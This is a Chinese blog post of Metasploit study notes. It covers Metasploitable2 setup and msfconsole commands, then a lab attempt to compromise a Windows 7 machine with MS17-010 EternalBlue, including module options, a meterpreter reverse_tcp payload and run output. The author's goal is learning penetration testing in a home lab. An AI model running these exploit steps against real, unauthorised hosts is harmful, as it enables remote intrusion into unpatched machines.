Kali学习3——MSF

metasploitable2

metasploitable为基于ubuntu的靶机。

下载后直接打开虚拟机即可。

默认账号密码是msfadmin

# 设置root密码
sudo passwd root

# 设置固定IP
vi /etc/network/interfaces
auto eth0
iface eth0 inet static
address xxx.xxx.xxx.xxx
netmask 255.255.255.0
gateway xxx.xxx.xxx.xxx

# 重启网卡
/etc/init.d/networking restart

metasploit framework

msf依赖postgresql数据库,因此需要在kali中先开启

# 启动postgresql
systemctl start postgresql

# 设置开机自启
systemctl enable postgresql

在打开msf console时,也会自动启动postgresql

  • connect命令

    一般用于内网渗透。

    msf6 > connect
    Usage: connect [options] <host> <port>
    
    Communicate with a host, similar to interacting via netcat, taking advantage of
    any configured session pivoting.
    
    OPTIONS:
    
        -C        Try to use CRLF for EOL sequence.
        -P <opt>  Specify source port.
        -S <opt>  Specify source address.
        -c <opt>  Specify which Comm to use.
        -h        Help banner.
        -i <opt>  Send the contents of a file.
        -p <opt>  List of proxies to use.
        -s        Connect with SSL.
        -u        Switch to a UDP socket.
        -w <opt>  Specify connect timeout.
        -z        Just try to connect, then return.
    
    msf6 > connect xuegod.cn 80
    [*] Connected to xuegod.cn:80 (via: 0.0.0.0:0)
    get /
    HTTP/1.1 400 Bad Request
    Server: nginx/1.6.2
    Date: Thu, 21 Jan 2021 08:05:06 GMT
    Content-Type: text/html
    Content-Length: 172
    Connection: close
    
    <html>
    <head><title>400 Bad Request</title></head>
    <body bgcolor="white">
    <center><h1>400 Bad Request</h1></center>
    <hr><center>nginx/1.6.2</center>
    </body>
    </html>
    
    
  • show命令

    show options 查看需要的参数

  • search命令

    search name:mysql

    search path:mysql 查询mysql目录下的漏洞

    search platform:mysql 查询影响mysql平台的漏洞

    search cve:CVE-2017-8464

  • use命令

    use 模块的名字

    msf6 > search cve:8464
    
    Matching Modules
    ================
    
       #  Name                                              Disclosure Date  Rank       Check  Description
       -  ----                                              ---------------  ----       -----  -----------
       0  exploit/windows/fileformat/cve_2017_8464_lnk_rce  2017-06-13       excellent  No     LNK Code Execution Vulnerability
       1  exploit/windows/local/cve_2017_8464_lnk_lpe       2017-06-13       excellent  Yes    LNK Code Execution Vulnerability
    
    
    Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/local/cve_2017_8464_lnk_lpe                                                                             
    
    msf6 > use 0
    msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) > 
    
    
  • info命令

    msf6 > search cve:8464
    
    Matching Modules
    ================
    
       #  Name                                              Disclosure Date  Rank       Check  Description
       -  ----                                              ---------------  ----       -----  -----------
       0  exploit/windows/fileformat/cve_2017_8464_lnk_rce  2017-06-13       excellent  No     LNK Code Execution Vulnerability
       1  exploit/windows/local/cve_2017_8464_lnk_lpe       2017-06-13       excellent  Yes    LNK Code Execution Vulnerability
    
    
    Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/local/cve_2017_8464_lnk_lpe                                                                             
    
    msf6 > info 0
    
           Name: LNK Code Execution Vulnerability
         Module: exploit/windows/fileformat/cve_2017_8464_lnk_rce
       Platform: Windows
           Arch: x86, x64
     Privileged: No
        License: Metasploit Framework License (BSD)
           Rank: Excellent
      Disclosed: 2017-06-13
    
    Provided by:
      Uncredited
      Yorick Koster
      Spencer McIntyre
    
    Module stability:
     crash-service-restarts
    
    Available targets:
      Id  Name
      --  ----
      0   Automatic
      1   Windows x64
      2   Windows x86
    
    Check supported:
      No
    
    Basic options:
      Name      Current Setting        Required  Description
      ----      ---------------        --------  -----------
      DLLNAME   FlashPlayerCPLApp.cpl  no        The DLL file containing the payload
      FILENAME  Flash Player.lnk       no        The LNK file
      PATH                             no        An explicit path to where the files will be hosted
    
    Payload information:
      Space: 2048
    
    Description:
      This module exploits a vulnerability in the handling of Windows 
      Shortcut files (.LNK) that contain a dynamic icon, loaded from a 
      malicious DLL. This vulnerability is a variant of MS15-020 
      (CVE-2015-0096). The created LNK file is similar except an 
      additional SpecialFolderDataBlock is included. The folder ID set in 
      this SpecialFolderDataBlock is set to the Control Panel. This is 
      enough to bypass the CPL whitelist. This bypass can be used to trick 
      Windows into loading an arbitrary DLL file. If no PATH is specified, 
      the module will use drive letters D through Z so the files may be 
      placed in the root path of a drive such as a shared VM folder or USB 
      drive.
    
    References:
      https://cvedetails.com/cve/CVE-2017-8464/
      https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464
      http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt
      https://msdn.microsoft.com/en-us/library/dd871305.aspx
      http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm
      https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
    
    

使用永恒之蓝对WIN7进行渗透

msf6 > search ms17_010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/ms17_010_psexec

msf6 > use 1
msf6 auxiliary(scanner/smb/smb_ms17_010) > show option
[-] Invalid parameter "option", use "show -h" for more information
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOST=192.168.197.54
[-] Unknown variable
Usage: set [option] [value]

Set the given option to value.  If value is omitted, print the current value.
If both are omitted, print options that are currently set.

If run from a module context, this will set the value in the module's
datastore.  Use -g to operate on the global datastore.

If setting a PAYLOAD, this command can take an index from `show payloads'.

msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOST 192.168.197.54
RHOST => 192.168.197.54
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.197.54:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x86 (32-bit)
[*] 192.168.197.54:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > back
msf6 > search ms17_010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/ms17_010_psexec

msf6 > use 2
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.197.53   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.197.54
RHOST => 192.168.197.54
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.197.53:4444 
[*] 192.168.197.54:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.197.54:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x86 (32-bit)
[*] 192.168.197.54:445    - Scanned 1 of 1 hosts (100% complete)
[-] 192.168.197.54:445 - Exploit aborted due to failure: no-target: This exploit module only supports x64 (64-bit) targets
[*] Exploit completed, but no session was created.

这里渗透失败了,是因为目标机是32位系统,而MSF内置的漏洞是64位的,需要安装32位的漏洞,这里参考的:https://blog.csdn.net/qq_41617034/article/details/91051614。然后使用32位的漏洞进行渗透:

msf6 exploit(windows/smb/eternalblue_doublepulsar) > run

[*] Started reverse TCP handler on 192.168.197.53:4444 
[*] 192.168.197.54:445 - Generating Eternalblue XML data
[*] 192.168.197.54:445 - Generating Doublepulsar XML data
[*] 192.168.197.54:445 - Generating payload DLL for Doublepulsar
[*] 192.168.197.54:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.197.54:445 - Launching Eternalblue...
[+] 192.168.197.54:445 - Backdoor is already installed
[*] 192.168.197.54:445 - Launching Doublepulsar...
[+] 192.168.197.54:445 - Remote code executed... 3... 2... 1...
[*] Exploit completed, but no session was created.

run了几次,但还是失败了,不知道是什么原因。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 211,194评论 6 490
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,058评论 2 385
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 156,780评论 0 346
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,388评论 1 283
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,430评论 5 384
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,764评论 1 290
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,907评论 3 406
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,679评论 0 266
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,122评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,459评论 2 325
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,605评论 1 340
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,270评论 4 329
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,867评论 3 312
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,734评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,961评论 1 265
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,297评论 2 360
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,472评论 2 348